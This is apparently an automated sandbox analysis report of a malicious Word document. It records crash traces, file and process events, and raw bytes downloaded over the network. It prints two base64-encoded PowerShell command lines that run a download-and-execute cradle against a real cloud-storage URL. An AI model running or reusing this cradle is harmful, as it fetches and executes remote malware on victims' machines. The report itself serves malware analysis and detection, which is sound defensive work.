RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

__exception__

June 18, 2023, 12:14 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x737d3102
SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x667bf7d0
??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed
??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf
DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871
DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef
_MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0
_MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab
??0OdfStgParams@@QAE@XZ+0xec034 mso+0xfeef3a @ 0x709bef3a
DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0
_MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4
_MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b
_MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a
_MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41
_MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43
_GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37
_GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d
_GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667
_GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169
_GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6
wdCommandDispatch-0x964 winword+0x1602 @ 0x2f881602
wdCommandDispatch-0x9cc winword+0x159a @ 0x2f88159a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 2081740
registers.edi: 2081904
registers.eax: 2081740
registers.ebp: 2081820
registers.edx: 0
registers.ebx: 2082956
registers.esi: 3221549073
registers.ecx: 2147483648

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$gamento (1).doc

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile June 18, 2023, 12:13 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000470 filepath: C:\Users\test22\AppData\Local\Temp\~$gamento (1).doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$gamento (1).doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""

cmdline

Powershell -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""

Word document hooks document open

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 18, 2023, 12:13 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (50 out of 985 events)

Data received	W
Data received	Sdvvúë¤`;TÐÊÆ,;Îö°DOWNGRD <ú D"~rÈ(¼L½£º:AA¦b£~£iÀ ÿ
Data received	&
Data received
Data received	AQ¥»¢LµnÉÏMGB&0±¿ðâÐÈfäé(I°~\|p W®àÖèE_ÏN¾ë+E}ÁG0E!ïê0h(¢g^Ü¾OV0æP Öfi¹öCêþ1 buWp w$°>Â¹ýú2ÄzP£NñØÿÑ°ü
Data received
Data received
Data received
Data received
Data received	0
Data received	) lðÌ5;ÈÎê XqÆ9Ùöíñ ©z¿À÷7©bþÃe¦
Data received	p
Data received	FÞã d(ðã¦Ï EöB_"üÀÇæ;ÇqÚQ%¦\|dY_~!lÃ÷±¢Z,èº)öÝ$ºãh/ÁèÎ}¶qÙ\|ÈFm¾ ç¶²×óy[+1ÉõS7eIw2?tÐ1´öaÐÐIÙL-;áå·2#ô´X®%_ÚÀã¢PÁ §Ý/!8r@,Åà=ÿÄ$ÎÑ]ýRHyüø0AÒ CËº·Ú <0`nb2²B÷Æd»aîdR¬«ü9×î°¼gÍYÃ µØ¤@´H¸òÆ·o0ã{Jjëê7bSF¬vÖzA¢°u¼ ¿ÀSFhó-V.9Ob±»,àK¡ÖBîª Ì\|lj2Ùznx¶XââÍå¥-''8uÍß·Põ{¢ÙXÕÎ÷ORåf£zrzh¨ôÎù «½~¼¬[Þ7ù';P{Í¸Ãý!Kùie¯úÐG SÙ.WX1òpÊÃÌÀÝ#¥ Ä\|Z¦kuÈØ#Ö 9%²Ó¿û&JÑ¦¡níJe=Ø¿ï{ôórV\|e\>úc@ë dxñ_3êu²ºuuôqégö[Ù¤nÌÕ$bþ¿9?ÁôH(¾¦sR3cã\±mÝ¬èó#0¨ZÊà\|!KT\|/)Áj++U¾¢;MÝ¹áº°]ð6î«Ú7Ð"Ub¼áHØ¨D2¼aw<:4?ÍgÇ®çÍímZ^è@ pG·Zóq§ôñWïQ.Ì{v¿Îc=×Ç.`¾}ÖóñR\tÏó Gxi(ì\|P¨iÎD²¥?Ò¼%0>jo"xöë9vba?fvT6¤ÁlÈÍ¹ÖÜêzÖ1¥Éº4R²0¡LuèÀw1ëfÞN#2n!íöd \|âå{MÌÍé(9FøÖnöðgæãîJ6×Ï,8ªmøìtÑf5ÒrÌ"°m7yû¢ÐEJXöüëî7½ÛÞSE1tb%É¨.ié{í® Ú`ZÕ´ôwpËoO©²PH Ck5ÉÖÚ}KódõQýÀFå#ðøé8çQäG¶ Ù>«ÛÅêâÓ3ÁxsÌ{B è[û1)Ll_Gßÿë'íØf~ÖØ£;RPé`GùµÑsVçVh½¼ü¬®úaºëfkw8ê+§ásHZ+ÕÚ0Ú\EÎÇªÝ½.§¤!\îí©Ó½1lë¼îyPÒ9Jo0®K>VJxepõjÌcgµ(Oóú= $1ÚÃPÛEä=¸2j¨ÖÞ,-fç-óèP¶Î~ØNÁxû¹Ü¶:O1;¢Ý:Û4ÊÉA>êº ùÙüïc¬¶h@âüDýÂ¢Øët@~êirõÀËÝÍÐã£!µ!kq®,!£ãV¹ËÖÎÄÃáñÎNÎµú¥¾2'':4ÛsZuxß¦¹ô;YfÉÐþ{ûåÍlñäé¼BdîÑ*,ï,ª&ôË×qöÜ9(íìKu÷RÁdÝ°0Ã/cý]qrh^(R} Áªh9ßA¶$+r9§íääWÏ±óAh¹°zð®¦»Æ ³³Îð%m¨sÂW¢ch°ÀE%>3-¹¯ÏJÌe¦ö4î¥Ð%E¼>ÿqÏæZ
Data received	¦]¤p/W·5¦éM(äÈñÒbÝ?ß`Àç'ßäS8õi½;½NrMêüá QC¦tSD\|Y«5éM¦³ëñ§b] Ofå¾\|=¢OZñæCPòzÈ£ÁÝ¬u`ó I#C,½I3hàÊ¡&7W\Ì³'Ex#Þ»±¤Å^èÀo¼F0!"Ý]<hÛùìwM¬Ï'ÙGPXÁ6Ñ]Úrk~cä» ¿§ÕM{¸P%ønmñÉjÎlÍ\¨Å1qbeÖB·73(¢åVGú²´¤ýø_iëÃ¿3¡Â«ñµÉîC¶'a¯JòÖÖ£ú¸nïZ!óÿ\³)x[Û¡ãÒ¡©£'iÈ ì×ó·WFy5U»~þ¹$"IéÝÙqÜtjýí!SC[ç1xrÔiAýHö¨7½ÉÉÛÄøvÆ³Fëà È?²ì_àº0¢¥±fþ{ð(áÔñ kÈ}òµì}ú±6\È$bôÇoEé~;pý~öÆÈg¸Äf0ûyÄ »ÌÃÎâóÕä³<c"AÉW¿¦Ã:ýGÏ@¥´·QÔKêü$ýè®½üø5ÙöôÃäÐóHCÌ4O<,GßË²äw§áúñ·&yÿiüµUZK"é4:pçoÔ«cÚ¯«´½Úsûiñ!5ê.§°bHÞù+¯[ã¶ÃÑ.ÁbÍþ?²Ùiß§Ã¶ WgÎ»Íç¾pGéZÇ «þ©Ééíå9çÒªååD¹©µãÖ $Úg¶Ì;ÒÆözúÔõèïãÀvG,2ó7¸[&ÿ¸§°P¶Â×B~>E@ëÛö3ÜËw-iM¦¦U!ìi³¬ñRÜX÷¡ÄBf)-¨r±[E¡Uõ¾ÂÕÇÚNcÕëµñúàM¡,C áx±æK¾^õ!á\» µÇTè3s°ªìêa1ÈFHÆ^¶5ÞçÇV¦ÂzM#<rX=JÝØì$¾V¸O×¯~SÞf%bXlÜ%>ßf«ù33X½0ÍÃmR½¢±>íøùc`MëJ×thº'ðF=òñ'C¨÷ªwÜ&\|=\|ª}é'Þ¶¡Ósù åQ/ÿ"µFgæ«N²eÌ ÿ"DHk¢fmsÖ®cÃëÌÚõãGËôz2§ìY)Ù÷âi¿Lw«\¨X,ªÃger+;F5Ü.%êCàÞØJp°»¨ãË¢º3EèZ%mJ³3ÐÁÝlûB¶'Õpiíàð³¿¢XË~ÿ¤ -äw<[¤8B¢åÌNS:ó3»;x×¯-¦}¤Ï³FÏÔé^<¢új:©¥x{0Éü3@»ä Íy¯"Wº3ô$v«6Ue=LäJ?,#Å&Z¿°Ï)Êª;©!w¤n½ý}Ø>Ë¶Z:~ýZËfRHþnÇÅF§jMKÈwf0-á{ Ð¤Ð }VXõk§ÅBd÷kºF 6À<[$Fo)0kÍ«Ð½aiß¼Xé?³?{R¾#@eæâ±®\|áõAnÿùêRµ¸GÙ2D g&»äÊ[¥nÁëpèfaNTí(dÆÁ
Data received	©\|<[DÉTÿ©Iªz Qÿ]z8YZ+é!½üÁÐþÒ"èu,N²ùtjF4×ØQGôMf´ìhÖµ;üþþÐ÷$© ´ÄNF¤@"%A #Âä¦ÖpB èèt¨¤yÎïAXÅzjÓUßÀ&o\7¹jòe U÷ég~þú aæN?IÓbÂ$qdÔ¦ú&h¾Æ×²uÍÀúìóS¾ïFéxÜÈÏÒL$ðÐ£¿±ôáÍÎí¯Z,¯®ÑOóö{¬6ÊG(®±´Ø©/_ýµ!×e!ÞdZ"_PUøO«ìÑA;¤K¶UOG°r©zölgW¤ÍÓ=ÃK¸X±ùî¿½ÛÔºÑq_þ\Ù¹E6¨d"zÝTIßÏ·ÁÅJjüfíÑöûìÇµqvõ^;ãµ(¡yÑd%N[2Y,½OÊfaoX7¤P~ã tðÙçNhmÀ¹ÉûñîTä4ä>Ú4´ô ØP`¦¼Þe§~d~rïæ[¸oøOLÕÖf3yÔ6ÝHÐvkw§Bý+3·ý{ª¡ùÞQÅ$ ¬ÞÄ¶ÌõF8r#¬g_I3dFF ¸vJgþ?´þeÐûèúA¬Ä cêv<rM2QmøÌ[zn-êð¥[tX Ó\ôÓ©ÙÉcþ%z=ÎþOùç#l]_EyëHjÓ¾°øòºwOüîæè}wÄ$î+ýêóUÀ«S®q±×·Ò3¼µá©Ø-fµÖ\ÝJÛz¡ÚFlÆRv¶Sô#¦(ÖO0í?0Ëo,»O½¾8'èÅ\ã¸ãÍª.·ÇyTü&npÄÖ!êï([ÝöÕ%RÛY¦ê³a¹ð¨¶.Öäð÷sÑ_²uå¹ÜÎÙX:3ýÕè^ ø·]ÍNpI!KDð¿ÜÌHêOûæòËju¹PøMÖ'GÕ EË$âØ¿ï¯s;TÎóìªãÒÏ &.yÎý(Ö¸àaÍùæ`b+¾WÝm Bí'ôV0hÁ ë9%Å1hd£µ0LIFYká]Q"þëÖV¶ñ} ü÷IBÌÆÛ,^`©Dç¥ÿÉâò^ñO5Ê;PHUãvËnØE[4½ðX£UÂVìþl¢ç_¦B¯(ÚrW£uOÀá^ç ø ®¸\|ø'´e2ü~èä¦äö;ð\÷§âùpl`¥Èi ÷wZ .;xÁ2÷<¨§BäILÏõãõêHäºÔ>çôîé¤O_-N¢ë6ý,oh6ØÇyÌÏåZiCÎÙåÞ¤éòÍ@FyEOe¯w;A?°±Þ³ÞÎ°ÍPÒ\°ÿò¾hÄ±ò¬ÿoÁÛå¬4?¬/¿@3G!ªºëäHH5z¢v&btX1zÁÕÜSý ó¸à('ªxÙgfîÂXôè\8ç½éß2Ù¢_Mõà6"ËOO/óVN¸úI*¶ëÚWW¯ÎåõD i»9Î#í> M@.w% ¨må¯ï zûCªâ×k¬öÏ;ªÆ]ÍíÄ>3¶ñt\ÉCi½+väòSp$Jy}È÷î¾1©È°íÔÿìËÖÆ`ã
Data received	ª¿¶Î"(Ã&!£3(jQ£f¿=¡ÂjÜaKàÿ'h!\èßÒ+Ìñ'Pj:Áè·f¬åi¹5pcßqªÏ))ôH<RdA»ßcñ¬v¶Á¯füF7Ä37-à³Oþ'h¹Dß+÷EÆÇJt§¾ÄôOp¶hÀ\éz¨Äù½£°3¾¾Õ`Ö[ZG07 ö@]thð8ÛªiI~E"èpûÞp^:XÅ"Ñ¦ï+U}Z}QsS-Çy^,U¯çëÀ:o÷@Û8{è5Ú(bàn¾ü2²9zýìÝ´þó È$]ÓYýT1ð/ØL»ãÎuu±z O·76æØÕÕ¼ÊÍ'y¶Cº£Ä$NrÔ4Ã£¹&pÑèÁd+«F2?dáÈ ïh=yÎ¶ Ýè±Í©àÙèÀ$8kB+xI'>¦zNp®1çXãWØUa`U,¼óJ%ÜQÚ{ðMgâ9n·¿¤èÚvËùr$¹Þät3ýÔýMh)¡Â¯À=ÛT§è¶î1ßösÉndc§}ÁM~Ô©O«÷POÿdgâ'¯A2ö(þo"1VÕÕþ(aÕ$½¾[á%TQoQuÒ/¤ª{qôTÌ:×ïºÎï&åæ@ñ®_ZÞ¹46ÏÀ²ÆdKûîÃ;>)éîbä72 ÷ôõ´³ü#Ä¬¨J J´éXòjBðõHÏfx¡N:SÍ+Â¢èöÊÞX{ç3à4jÿ ¹§_%ë[hRQ!ìÓfX)S~vpÿýGàÛôýÓý¶bpfgyäÞ}öÏÆUR%á}æ3û=%§ëRÛï°oæ{Þ8øoPø1Â¸tè0°'f>Ð}ßPRÉÌtGKEÛ¤íÜ4ïä¥¥ð>st´ÜÌ¿ÍßW1»3ßíóÎ*ÄÖsýuÀDN#b~³~cÂ5Ws6óÞáí-ý}½Å¬Ý¸ØFëí&FÚ¨(IH´ØVgy² jï½Ìíaü÷Of:ï¡Ñl&µ6Ú)Üé7õK2«¥BkåñÅ¦wÅû;óûÎ?b?z9µçjSd«±Ö%4\ ¾¦F#²ð Ã çZZ\aY!¹Wº`Ù!±Ô¬'µgøï@ÌxB¤ÌÜÝ]fi$Âÿr'ûy~ËÜæ¾Á]½ÿ©qOÊË¶hQuªOðC}2y6@ÕäýÕ¿,M«k#}3 f^Æñ9¡N·W,G¾ÃÔÜpaþBÈ¬ÙÆøy2eÄïozÎ~¾ÑHíìÙMþ8!Lêòf".H3jÜ(TU ê\|Àd(ÜV4Xú£2qÃ¸°uäig× Pßß#ðdb.y¦ÄV¬»6=YE'¤Ã¿e¨ìDUÂÛjeü×3n¥¹P¦ H+ÊK6ÿ0è¤4?>E@ãìgQÉÎÃÜÀÀqáàºË÷Ù¯ìì:xgv· ùÑx±ÊÄH ¾Ø5o Á¢fW³^Î F¡xEüÞËºUHí22ÉLa×t,ú÷W¯-<yQö³>z[òÕ¨èë¸\|ØEP @,Ü 6¦(ÿàL!Ñ
Data received	ö+s§Ì´d\|Ê¡6§Æþª²ïîol±øæô~/Z_öQUiÍx2båk<Ñq=s]¢ÜÇx)óã·Î³iMaûË©"aHUö£ð Ó¥þ zE±Ñ`éÈBx«)Å·Dw0a`3% ÆZHXy¯po9½FàV§ º?\|X~GµøDéµÊÈhÕ»`·Y1Î°=èÀte-É( Õø1îµDw5©[ùÕî Ï¸LÍ;îà²éJYÛ4#B![C¼&ðÅBUû²ÆÄ²?úegb¹j4ØÔV¹vË²Àè/+¿\U82¼ý±Xçò/Ç ¿vÃ~2³²ª?Ðê§[¾¾T³D´ «üA^V¸Ç[ÆS/1ÀRè¹® 9h¼R½ÏÃöuÆîsÀ[?ãÖñ×;ÿ¦ñ«¾LwÍzÏ®©{ Î¡´ÉãðOÿ¸rè4>FËÑg2¼©ë¢å`jObMúyvÇÆêß&øP§+Rüë¯éòqn@]ªâG eiï4IT!Ù9¹{¦øÖ¥ºÙg4::àÑê+O>\ÛN'DO ßÝo;hìé:kþïÒ ¡ w;lß5Å6©gÊzNüN¹?¶¶)«sDÕË#3=¦56³ÚDÞÿ¥¨ÎC¦&þ$ËÊ/ÎY}M¼»ê%-ÛãNï&¯ÑpÿÖ¾¦%Ì9÷ )i³q$JÞ®nÛ p¨NO«C »Á91Êæj¼±Yç4FßBC\|ð×G¯ÝÖ¬#e©Y$àÑè]¸_RÝãHµÖ¯=ÔéÏòRw-ÉÛe#§wêò¼IÙ]î~jiÎ&º{ãÁ¯´§ÂÞ °<mvÍ¦ÄÑåh>MT¶Ý kÑFÏf ð+ /¹1ûú=#E ÚÏWî¾#.±Û ¦!¢->lµ¤ûÑ?¼rôtÅ¬=æÜsý/§Ëuöó mÐI{f³®»2Øô#þO¬©á¸ìÈMdk(~Xí¥ïâiF< o¬ô¢®¿HÂPÝ83Ðæ$/ÖÿµÉf"ÎC)µ4À4!{¬¤$8fpcÝ×ïWq%t8Ø»=¡JSõ¯ÚR²6ýGÓ¯_°9æî\|ì£=9<b>¡Ûá½~¯üÈö°9Ï'Ñ&´å\|.¦#¥=»w¨7¡¼RV¶°¦ #âvÚvóî] X¶ùðXèçÔ!±ÚQ3øýYë)}áÀÔù<óTm3óã!á°ÏÅÖ©óQTÖxJ< \|DpÖJGúh^ôüå¼Kþ\ÙÿrnÎ`6è¯ûæçØCEµ²øö}´Ðþ´õ&è´j!òÖëUwð9RºÂ¡)mË¼!¿[.n6QÁÊºóâ-pÍ¦¶6/ÖÈ¡9·È\|`Cºù]ó¢òlÑ+ÀGÆ¸4É\|¦pâ¯Ó%Ù3{`kyOZq ¤ Däg\|Å$0ûqQs£àôO¡6áv·úôí¬ü¨`Qít±-YÊþjJa2R¤;È³ÒÏ8K[öG¨±é §µPrkÂF<;iÍ.n3ôrÆ¦WdxäÐìFx½]QÝLi¹98nãûuú\j /éÚêS±ï¾¬èÁ+û¹nª};"·
Data received	ëkj,ùfyW1B¨yJ®î+òÉ´sÏV¡97¦²^çïNH¯í3(oÔ$+¦ðÔÚó¿¶ðîp1ÇÊr~úó6ý#£([y´ûHõëGïl8Ëô\|~ÓÏ<GY[ÔóN5ý@vS=¬¾UOû³ÓÄ Oß¸^ÔH pkÓ&¿jÔ [¯s£Hº?ëKüQ½8=_·êYkõWGBfÞÁî}jõß0¸vl"çVü±¢1öìAïjL'ÝÛý¤YÕ_AV#'ÉcIùNVÞNªÿvËñ>Ä» ¡I±Â£o ÇWþ }°)QÉRíýþi=%,NLAªì\æ(þXGmGä¿n@±9¾2ku@A¯´CÚAXèv¿&§Ûà.ZVµZx ·"ýReeÏÀªkÀ !ºÌN¬h²E\è;2ÇK¯Á¼m¦^§Þ}ã¢<tÓ[Ì¶¯×··hKáF©ßÒQvLÏÔÚr/þ·ÎÒÂ°gÕ×m&g¸l¿µ¸W cgç0ÕWe!W°Oü~mñê £"ÔdEûC«Ò¸Lû¿>C&.G°vµô VÊÄÿ}tàYÆ!Q= b)\|«K?¨qb.;^J¦À¯Ä:²Ö¯+ÄL:Ú93Å)yYÒAQF>Rµ¸åÚKf´jJÎAñ° ^Å3Vd2sòs#vÜ}Uñô¼¦Hîö¢Uõ\¥-«û{X\|ÐÌöÅD'¾¢"F<+¨ck¶%^ÃÝî´3,Î±îµ·¤C´ÿ®ø+O-ÿÞ^¼ ìfXeáÌ:ZQÓ;: }7]´¤qy[§È$Åï{;9&Úý&BDYÿgÉÔHZHAõqHI,àÓ:®oóÍ?Tê¢Ñ¼ò^JÒã«¥ÂDéiâ=`dQùà]yöXî¼ÌúgöoÀÁÿôjÈò3ÅZýHôÉL.àA.¸ñ]÷{,ßóé=2=³ÆjÄõGÉ#;OÉí ahy~ïìiN»p}{TÝa}eÁÏ(è(®¤cÎN~û}ÃÇ\|&þß²Ù0îî2gûü¨Äñdi±M?Mõ·°öìÖµá¦vÌ4ØnyÀí<¡4ÒWí8dKGI6'ã1×1µúü=`A@5éAú¡à,Ó:ÉqièÒW³JpYìm=Ð+þ<y>{®HHy]{Iró¯³18[ vM2§Pkä~ÊðI÷±ëÖiûB}Â¦^%m ÆÎÿ$)KJÒÕÁÎí4ÀÂçìò))Ã¶.!Ä[¸2NÞJ«Ê2ASñ°×X.òÍnx,¿ØâòØÛõm0r>$¾Qì5$!·PZÅÞ#ëõ±êMõÄ(MbÅ¤;U[÷ÍÚ~uq7aÇx1¤] \|ôTå(5E¡Ý©:âÄÉªm×U×Û-ñ©ÚP§Å5ë"ÙEÚJ¦`)ËjàòÀ.LLPÝ ¿,)HÐ 4y»\|°MW¶ï§¿ `(e5´I{¶É 6ë°}?Áß þ¦{Ãþø¸özýª7`
Data received	Ù~<7RÒþß½Û£yGLC?x
Data received	ºeÝ]SAÆgBà¦-¬LÊçÌDÏ;»±Ëðg;)oeÑê\|RlFÁ¨,×\ïjÌ+áW¿ ?âÿi°(Ø4®t`~7c5ÀQ&.ÖÝYY³°»´hÚBCÄ=( \|õêY¡Ý'e°ãj9ÒBquÅÙi'ÚC1Ì¯´vëg¼Ài&¡×ùZ¿{v¢ºÇ¯è®zÛØ°\ù©QÜééÆ_ÊÁÈàF¨97Ä8Ë=TBãÖvÝÙÿk®¾«x1iF-_2â°,êä.ÐzJéÝgÌà½QÕ®0X¹Ûðá59i´ùgî?}g ¹0Tb-:c¤Mq7+w«- %·°,Á6²ix4wp&\|xDsëVY7`[aÇÍuúmSíÈ>À4ôI¡u<ÿcÕé#§ú«K-ÂÓ!ØíöKèÇ%'¡z-Å´\|ÒaXîÓëü½î0Ãn\ÎDZbï©bÉÙI'f@áp·ôÏÆµ1¿& ù)BÂr\Ç/}%aUZ0.=å(õÚKßläûißÖ¬C¹ Qc iúh¶¢k¦yÃd9ÐtÏÝA¦o;½ÛXf¤g0N¿j³wÑ[ïçÿM££ÃO§ºxfàÈ§cBLóÜ¹ûrO×aè7ªýã>,)lÛÝÓ®a/¢¼¸ÀãÛÓè'yG°xã½× S¥Q§\|éÓfxeum9þñó½ôY"c8=¾½(»< ß¦935fj¶dgI bÜsg#iV¹Ffì:Euó:}F»O ÆåA¢§=AÏ(ùJÁ«í½D½ %vË$h,n¥ö}úÿÝeÍ'w.Ñ=Ä½çÌ¦W÷o8q.`«à3§¾)Õî³1ô4!PÜ'6 ³×ÓQBuöIî½]ïáa[Ò~Ò? VÈÐí1þÃýE <¥ Zá+KVJgEJeßÿ¢ôÎÏë¹Û(\4éþÐÚcZÃL½8jÂh6¯j0yaÿEùØ=>sá;)qß§5jÕ&ì4<aÓ1ôKPö+,¦í'òùÖö¼´þ"RhxG # ÞXOKþ£/vG¥~ìg½Ñeîu5F¢Édöø¡ &5æ«Ý¢¨óÔßO1ûVe±WÆÍQ9j<¬¼Èóú)jY×Ì8@QWÐw´ ¸ÅA~+]<¥³êÙ×ü$÷¢Êí¡~ÛÃÚ4 9&ùA±»(Æ¦¦¿>a¬{3¹\|Ðåûèr)c®KEÔ<µ?ÉïZ( gÝ(Ì `ÃbÓÅ¨U}måbóæÛ®»n?Â°;#´+lË^[ðöuª´öqõ\|Rr{<ÛÀà[4{ÞÊZ«^xÜýFåËÊìÏ¸· JÓTdù}®µ!¤4fr2¯ÙÅúm<#Ô'9Ï )¥=xþæÕMÅÞºíRxCwàBÔ´[Ñº*Ö oKD\¶ñK¼NM&Õ4øo"9/T0áP®k'ZyÍòøÏVÈe Os¨Îlxq-ÿðAöùæ8u¨Fe&öã¸y x
